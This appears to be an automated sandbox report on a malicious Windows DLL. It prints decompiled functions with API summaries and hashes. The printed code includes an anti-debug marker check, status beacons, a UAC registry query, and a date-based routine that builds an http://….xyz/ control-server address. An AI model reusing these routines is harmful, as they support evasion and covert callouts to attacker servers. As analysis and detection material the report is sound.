				_t44 = __edi;
				_t36 = __ebx;
				E1001FDB0();
				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "installp3", "-0.3", "46.0.0", "exe");
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E10020180(__ebx, __edi, __esi, _t62);
				_t52 = _t51 + 0x1c;
				if(PathFileExistsA("C:\\hijack") != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E10020180(_t36, _t44, _t45, __eflags);
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "installp3");
					E1001FEA0(_t36, _t44, _t45, __eflags);
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "installp3");
					E1001FDC0(_t36, _t44, _t45, __eflags);
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E10020180(_t36, _t44, _t45, __eflags);
				} else {
					E1001A0A0();
					if(E1001A0B0(_t37) == 0 || E10019D10() != 0) {
					} else {
						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0);
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A260();
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}












                                                                                                                                                0x10020575
                                                                                                                                                0x10020575
                                                                                                                                                0x10020575
                                                                                                                                                0x10020575
                                                                                                                                                0x10020644
                                                                                                                                                0x10020662
                                                                                                                                                0x1002066a
                                                                                                                                                0x1002066d
                                                                                                                                                0x1002066f
                                                                                                                                                0x1002067f
                                                                                                                                                0x10020685
                                                                                                                                                0x1002068a
                                                                                                                                                0x1002069a
                                                                                                                                                0x100206d0
                                                                                                                                                0x100206d0
                                                                                                                                                0x100206d5
                                                                                                                                                0x100206e5
                                                                                                                                                0x100206eb
                                                                                                                                                0x100206f3
                                                                                                                                                0x100206f8
                                                                                                                                                0x10020708
                                                                                                                                                0x1002070e
                                                                                                                                                0x10020716
                                                                                                                                                0x1002071b
                                                                                                                                                0x1002072b
                                                                                                                                                0x10020731
                                                                                                                                                0x10020739
                                                                                                                                                0x1002073e
                                                                                                                                                0x1002074e
                                                                                                                                                0x10020754
                                                                                                                                                0x1002069c
                                                                                                                                                0x1002069c
                                                                                                                                                0x100206a8
                                                                                                                                                0x100206b8
                                                                                                                                                0x100206bf
                                                                                                                                                0x100206c4
                                                                                                                                                0x100206c7
                                                                                                                                                0x100206c9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100206cb
                                                                                                                                                0x100206c9
                                                                                                                                                0x100206a8
                                                                                                                                                0x1002075c
                                                                                                                                                0x10020761
                                                                                                                                                0x1002076b
                                                                                                                                                0x10020775
                                                                                                                                                0x1002077a
                                                                                                                                                0x10020783
                                                                                                                                                0x1002078e

                                                                                                                                                APIs
                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\hijack), ref: 10020692
                                                                                                                                                  • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DefaultExistsFilePathSystem
                                                                                                                                                • String ID: -0.3$46.0.0$C:\hijack$exe$install$installp3$status=main_start
                                                                                                                                                • API String ID: 482051434-3201047541
                                                                                                                                                • Opcode ID: 051d65800e02d229b61314b8e794e929d0b096babbc7c86b35b6e46c780172d3
                                                                                                                                                • Instruction ID: 180e9a89bd69158387d9cbec8d9a940dcb427d9c64843ce9222d1c9730998d87
                                                                                                                                                • Opcode Fuzzy Hash: 051d65800e02d229b61314b8e794e929d0b096babbc7c86b35b6e46c780172d3
                                                                                                                                                • Instruction Fuzzy Hash: AE01D178E483185FD750EFA49C4A7DE77B2DF50254F9001A8FD08A6243EB31B6908EA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1002185A, Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                			E1002185A(void* __ebx, void* __edx, void* __edi) {
				void* _t60;
				void* _t80;
				void* _t101;
				void* _t154;
				void* _t156;
				void* _t158;
				void* _t171;

				L0:
				while(1) {
					L0:
					_t150 = __edi;
					_t106 = __ebx;
					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
					_t60 = E100021E0(_t154 - 0xe2a4);
					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
						break;
					}
					L2:
					E1000CF20(__edi, _t154 - 0xab84, 0, 0x3710);
					E1000CF20(_t150, _t154 - 0x3d54, 0, 0x3710);
					_t80 = E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
					_t151 = _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
					E1000D190(__ebx, _t150, _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
					E1000D8A3( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
					E1000CF20(_t150, _t154 - 0xe294, 0, 0x3710);
					E1000CF20(_t150, _t154 - 0x746c, 0, 0x3710);
					E1000CC93(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
					_push(_t154 - 0x3d54);
					_push(_t154 - 0xe294);
					_push( *((intOrPtr*)(_t154 + 8)));
					E1000CC93(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
					_t171 = _t156 + 0x7c;
					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
						E1000D190(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAC0(_t154 - 0x746c));
						_t171 = _t171 + 0x10;
					}
					_t101 = E1000CAC0(_t154 - 0x746c);
					_t156 = _t171 + 4;
					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
				}
				L5:
				 *((char*)(_t154 - 4)) = 1;
				E100011A0(_t154 - 0xe2dc);
				 *((char*)(_t154 - 4)) = 0;
				E10003010(_t154 - 0xe2a4);
				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
				E100011A0(_t154 - 0xe2c0);
				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
				 *((char*)(_t154 - 0x21c)) = 0;
				E1000CF20(__edi, _t154 - 0x21b, 0, 0x1ff);
				_push( *((intOrPtr*)(_t154 - 0x18)));
				_push( *((intOrPtr*)(_t154 + 8)));
				E1000CC93(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
				_t158 = _t156 + 0x20;
				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
					E1000D190(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAC0(_t154 - 0x21c));
					_t158 = _t158 + 0x10;
				}
				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAC0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
				return  *((intOrPtr*)(_t154 - 0x14));
			}










                                                                                                                                                0x1002185a
                                                                                                                                                0x1002185a
                                                                                                                                                0x1002185a
                                                                                                                                                0x1002185a
                                                                                                                                                0x1002185a
                                                                                                                                                0x10021863
                                                                                                                                                0x1002186f
                                                                                                                                                0x10021874
                                                                                                                                                0x1002187a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10021880
                                                                                                                                                0x1002188e
                                                                                                                                                0x100218a4
                                                                                                                                                0x100218cb
                                                                                                                                                0x100218ee
                                                                                                                                                0x10021912
                                                                                                                                                0x10021951
                                                                                                                                                0x10021967
                                                                                                                                                0x1002197d
                                                                                                                                                0x1002199a
                                                                                                                                                0x100219a8
                                                                                                                                                0x100219af
                                                                                                                                                0x100219b3
                                                                                                                                                0x100219c6
                                                                                                                                                0x100219cb
                                                                                                                                                0x100219d4
                                                                                                                                                0x100219f6
                                                                                                                                                0x100219fb
                                                                                                                                                0x100219fb
                                                                                                                                                0x10021a05
                                                                                                                                                0x10021a0a
                                                                                                                                                0x10021a10
                                                                                                                                                0x10021a10
                                                                                                                                                0x10021a18
                                                                                                                                                0x10021a18
                                                                                                                                                0x10021a22
                                                                                                                                                0x10021a27
                                                                                                                                                0x10021a31
                                                                                                                                                0x10021a36
                                                                                                                                                0x10021a43
                                                                                                                                                0x10021a48
                                                                                                                                                0x10021a4f
                                                                                                                                                0x10021a64
                                                                                                                                                0x10021a6f
                                                                                                                                                0x10021a73
                                                                                                                                                0x10021a83
                                                                                                                                                0x10021a88
                                                                                                                                                0x10021a91
                                                                                                                                                0x10021ab3
                                                                                                                                                0x10021ab8
                                                                                                                                                0x10021ab8
                                                                                                                                                0x10021acd
                                                                                                                                                0x10021ad6
                                                                                                                                                0x10021ae1

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3854912713-0
                                                                                                                                                • Opcode ID: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                • Instruction ID: ecc14f8781584b065d37a28c2fb0b24bdd6a5e60bbd0adb2cb8e7c12e54bf0d8
                                                                                                                                                • Opcode Fuzzy Hash: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                • Instruction Fuzzy Hash: 3B4192B6D002186BDB14D7A0DC92EEE737DEF54280F0449A9F50DB6246EA747B448BA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 100223F0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E100223F0(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				char _v292;
				signed int _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				void* __ebp;
				char _t61;
				char _t62;
				signed int _t70;
				intOrPtr _t102;
				intOrPtr _t103;
				char _t115;
				char _t116;
				signed int _t118;

				_t132 = __esi;
				_t131 = __edi;
				_t101 = __ebx;
				_t61 = "rundll32"; // 0x646e7572
				_v24 = _t61;
				_t102 =  *0x100254e4; // 0x32336c6c
				_v20 = _t102;
				_t115 =  *0x100254e8; // 0x0
				_v16 = _t115;
				_t62 = "explorer"; // 0x6c707865
				_v308 = _t62;
				_t103 =  *0x100254f0; // 0x7265726f
				_v304 = _t103;
				_t116 =  *0x100254f4; // 0x0
				_v300 = _t116;
				E1000CF20(__edi,  &_v292, 0, 0x108);
				E1001F150( &_v24,  &_v292,  &_v24);
				E1000D190(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
				_t118 = _a4;
				_v12 = E1000CAC0(_t118);
				_v296 = 0;
				_t70 = _v12 & 0x80000007;
				if(_t70 < 0) {
					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
				}
				if(_t70 == 0) {
					_t120 = _v12 + 8;
					__eflags = _t120;
					_v296 = _t120;
				} else {
					asm("cdq");
					_t120 = _t118 & 0x00000007;
					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
				}
				_v8 = L1000CE56(_t101, _t120, _t131, _t132, _v296);
				E1000CF20(_t131, _v8, 0, _v296);
				E1000D190(_t101, _t131, _t132, _v8, _a4, E1000CAC0(_a4));
				E1001F0B0(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
				asm("cdq");
				_v312 = L1000CE56(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
				asm("cdq");
				E1000CF20(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
				_t90 = _v296 + 2;
				asm("cdq");
				E1001F240(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
				_push(_v8);
				E1000CA30(_t101, _t131, _t132, _t90 % 3);
				return _v312;
			}
























                                                                                                                                                0x100223f0
                                                                                                                                                0x100223f0
                                                                                                                                                0x100223f0
                                                                                                                                                0x100223f9
                                                                                                                                                0x100223fe
                                                                                                                                                0x10022401
                                                                                                                                                0x10022407
                                                                                                                                                0x1002240a
                                                                                                                                                0x10022410
                                                                                                                                                0x10022413
                                                                                                                                                0x10022418
                                                                                                                                                0x1002241e
                                                                                                                                                0x10022424
                                                                                                                                                0x1002242a
                                                                                                                                                0x10022430
                                                                                                                                                0x10022444
                                                                                                                                                0x10022457
                                                                                                                                                0x1002246c
                                                                                                                                                0x10022474
                                                                                                                                                0x10022480
                                                                                                                                                0x10022483
                                                                                                                                                0x10022490
                                                                                                                                                0x10022495
                                                                                                                                                0x1002249b
                                                                                                                                                0x1002249b
                                                                                                                                                0x1002249e
                                                                                                                                                0x100224be
                                                                                                                                                0x100224be
                                                                                                                                                0x100224c1
                                                                                                                                                0x100224a0
                                                                                                                                                0x100224a3
                                                                                                                                                0x100224a4
                                                                                                                                                0x100224b3
                                                                                                                                                0x100224b3
                                                                                                                                                0x100224d6
                                                                                                                                                0x100224e6
                                                                                                                                                0x10022503
                                                                                                                                                0x10022521
                                                                                                                                                0x10022532
                                                                                                                                                0x1002254a
                                                                                                                                                0x10022559
                                                                                                                                                0x10022572
                                                                                                                                                0x1002258b
                                                                                                                                                0x1002258e
                                                                                                                                                0x100225a5
                                                                                                                                                0x100225b0
                                                                                                                                                0x100225b1
                                                                                                                                                0x100225c2

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_strlen
                                                                                                                                                • String ID: explorer$rundll32
                                                                                                                                                • API String ID: 1975251954-2912785976
                                                                                                                                                • Opcode ID: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                • Instruction ID: 8d15330d89fc5d0acd7d9b91591f78a2dd970f15495d3f7c9849200120727594
                                                                                                                                                • Opcode Fuzzy Hash: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                • Instruction Fuzzy Hash: 84515FBAD00218ABDB14DB98DC92FEEB3B9EB4C304F044199E50997341E635BB54CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001DC00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF20(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF20(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
					_t38 = E1001D7E0(_t68,  &_v548);
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D2D0(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D560(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DA70(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t53 = E1001DA70(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D2D0( &_v548,  &_v548);
						E1001D320(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001CFA0("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
				}
			}























                                                                                                                                                0x1001dc00
                                                                                                                                                0x1001dc00
                                                                                                                                                0x1001dc00
                                                                                                                                                0x1001dc0d
                                                                                                                                                0x1001ddb4
                                                                                                                                                0x1001ddb4
                                                                                                                                                0x1001dc13
                                                                                                                                                0x1001dc28
                                                                                                                                                0x1001dc30
                                                                                                                                                0x1001dc3e
                                                                                                                                                0x1001dc45
                                                                                                                                                0x1001dc54
                                                                                                                                                0x1001dc5b
                                                                                                                                                0x1001dc60
                                                                                                                                                0x1001dc63
                                                                                                                                                0x1001dc74
                                                                                                                                                0x1001dc81
                                                                                                                                                0x1001dcd9
                                                                                                                                                0x1001dcde
                                                                                                                                                0x1001dce1
                                                                                                                                                0x1001dce3
                                                                                                                                                0x1001dd1e
                                                                                                                                                0x1001dd25
                                                                                                                                                0x1001dd39
                                                                                                                                                0x1001dd40
                                                                                                                                                0x1001dd45
                                                                                                                                                0x1001dd48
                                                                                                                                                0x1001dd4a
                                                                                                                                                0x1001dd5f
                                                                                                                                                0x1001dd5f
                                                                                                                                                0x1001dd6d
                                                                                                                                                0x1001dd72
                                                                                                                                                0x1001dd72
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dd4a
                                                                                                                                                0x1001dcec
                                                                                                                                                0x1001dcf1
                                                                                                                                                0x1001dcf4
                                                                                                                                                0x1001dcf6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dcf8
                                                                                                                                                0x1001dcff
                                                                                                                                                0x1001dd04
                                                                                                                                                0x1001dd07
                                                                                                                                                0x1001dd09
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dd0b
                                                                                                                                                0x1001dd12
                                                                                                                                                0x1001dd17
                                                                                                                                                0x1001dd1a
                                                                                                                                                0x1001dd1c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001dc95
                                                                                                                                                0x1001dc9c
                                                                                                                                                0x1001dca1
                                                                                                                                                0x1001dca4
                                                                                                                                                0x1001dca6
                                                                                                                                                0x1001dca8
                                                                                                                                                0x1001dcaf
                                                                                                                                                0x1001dcc5
                                                                                                                                                0x1001dcca
                                                                                                                                                0x1001dcca
                                                                                                                                                0x1001dd75
                                                                                                                                                0x1001dd7e
                                                                                                                                                0x1001dd80
                                                                                                                                                0x1001dd91
                                                                                                                                                0x1001dd96
                                                                                                                                                0x1001dd96
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ddae

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001DC28
                                                                                                                                                • _memset.LIBCMT ref: 1001DC45
                                                                                                                                                • _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                • GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                • _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                  • Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                  • Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                  • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                  • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                  • Part of subcall function 1001DA70: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                  • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
                                                                                                                                                  • Part of subcall function 1001DA70: DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                  • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
                                                                                                                                                  • Part of subcall function 1001DA70: CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                  • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                • String ID: Mid2Failed
                                                                                                                                                • API String ID: 2934472556-1001836097
                                                                                                                                                • Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                • Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
                                                                                                                                                • Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                • Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 100225D0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			E100225D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				struct _SYSTEMTIME _v36;
				char _v303;
				char _v304;
				char _v332;
				char _v360;
				char _v388;
				signed int _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				void* __ebp;
				intOrPtr _t91;

				_t97 = __eflags;
				_t89 = __edi;
				_push(0xffffffff);
				_push(E10022A77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t91;
				_v392 = 0;
				E10001160( &_v332, __eflags, "http://");
				_v8 = 0;
				_v304 = 0;
				E1000CF20(__edi,  &_v303, 0, 0x103);
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetLocalTime( &_v36);
				_push(_v36.wDay & 0x0000ffff);
				_push(_v36.wMonth & 0x0000ffff);
				E1000CC93(_t89,  &_v304, "changenewsys%04d%02d%02d", _v36.wYear & 0x0000ffff);
				_v20 = E1001A480(__ebx, _v36.wYear & 0x0000ffff, _t89, __esi, _t97,  &_v304);
				_v396 = E10001160( &_v360, _t97, _v20);
				_v400 = _v396;
				_v8 = 1;
				E10001A70( &_v332, _v400);
				_v8 = 0;
				E100011A0( &_v360);
				_push(_v20);
				E1000CA30(__ebx, _t89, __esi, _t97);
				_v404 = E10001160( &_v388, _t97, ".xyz/");
				_v408 = _v404;
				_v8 = 2;
				E10001A70( &_v332, _v408);
				_v8 = 0;
				E100011A0( &_v388);
				E10001110(_a4, _t97,  &_v332);
				_v392 = _v392 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v332);
				 *[fs:0x0] = _v16;
				return _a4;
			}



















                                                                                                                                                0x100225d0
                                                                                                                                                0x100225d0
                                                                                                                                                0x100225d3
                                                                                                                                                0x100225d5
                                                                                                                                                0x100225e0
                                                                                                                                                0x100225e1
                                                                                                                                                0x100225ee
                                                                                                                                                0x10022603
                                                                                                                                                0x10022608
                                                                                                                                                0x1002260f
                                                                                                                                                0x10022624
                                                                                                                                                0x1002262c
                                                                                                                                                0x10022634
                                                                                                                                                0x10022637
                                                                                                                                                0x1002263a
                                                                                                                                                0x1002263d
                                                                                                                                                0x10022645
                                                                                                                                                0x1002264f
                                                                                                                                                0x10022654
                                                                                                                                                0x10022666
                                                                                                                                                0x1002267d
                                                                                                                                                0x1002268f
                                                                                                                                                0x1002269b
                                                                                                                                                0x100226a1
                                                                                                                                                0x100226b2
                                                                                                                                                0x100226b7
                                                                                                                                                0x100226c1
                                                                                                                                                0x100226c9
                                                                                                                                                0x100226ca
                                                                                                                                                0x100226e2
                                                                                                                                                0x100226ee
                                                                                                                                                0x100226f4
